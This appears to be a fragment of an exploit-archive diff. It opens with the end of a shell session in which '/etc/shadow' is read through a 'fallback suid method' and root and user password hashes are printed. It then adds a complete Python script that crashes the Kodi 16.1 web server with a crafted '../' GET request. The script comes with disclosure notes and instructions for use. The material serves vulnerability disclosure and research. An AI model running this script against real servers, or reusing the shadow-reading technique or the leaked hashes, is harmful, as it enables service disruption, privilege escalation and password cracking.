+-sh-3.2$ cat /etc/shadow +Using fallback suid method +#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7::: +root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7::: +bin:*:14495:0:99999:7::: +daemon:*:14495:0:99999:7::: +adm:*:14495:0:99999:7::: +lp:*:14495:0:99999:7::: +sync:*:14495:0:99999:7::: +shutdown:*:14495:0:99999:7::: +halt:*:14495:0:99999:7::: +mail:*:14495:0:99999:7::: +uucp:*:14495:0:99999:7::: +operator:*:14495:0:99999:7::: +games:*:14495:0:99999:7::: +gopher:*:14495:0:99999:7::: +ftp:*:14495:0:99999:7::: +nobody:*:14495:0:99999:7::: +vcsa:!!:14564:::::: +sshd:!!:14564:::::: +guest::14564:0:99999:7::: +bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7::: +-sh-3.2$ diff --git a/platforms/windows/dos/40208.py b/platforms/windows/dos/40208.py new file mode 100755 index 000000000..37a90ac96 --- /dev/null +++ b/platforms/windows/dos/40208.py @@ -0,0 +1,54 @@ +# Exploit Title: Kodi 16.1 Web Server Remote DoS +# Date: 06/08/2016 +# Exploit Author: Guillaume Kaddouch +# Twitter: @gkweb76 +# Blog: https://networkfilter.blogspot.com +# GitHub: https://github.com/gkweb76/exploits +# Vendor Homepage: https://kodi.tv/ +# Software Link: http://mirrors.kodi.tv/releases/win32/kodi-16.1-Jarvis.exe +# Version: 16.1 +# Tested on: Windows 7 Family x64 (FR) +# Category: DoS + +""" +Disclosure Timeline: +-------------------- +2016-08-02: Vulnerability discovered +2016-08-04: Vendor contacted +2016-08-04: Developper answered. Kodi v16 is End Of Life and will not be fixed. +2016-08-06: Exploit published. + + +Description : +------------- +A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request. +The web server is disabled by default. + + +Instructions: +------------- +- Starts Kodi, and enable the web server in System, Services, Web server. +- Run this exploit locally or from your remote attacking machine. +""" + +import socket + +host = "192.168.135.129" +port = 8080 + +junk = '../' * 10 +buffer = "GET " + junk + " HTTP/1.1\r\n" +buffer += "\r\n\r\n" + +try: + print "[*] Connecting to %s:%d" % (host, port) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + print "[*] Sending buffer... (%d bytes)" % len(buffer) + s.send(buffer) + s.close() + + print "[*] Done." +except: + print "[-] Error connecting"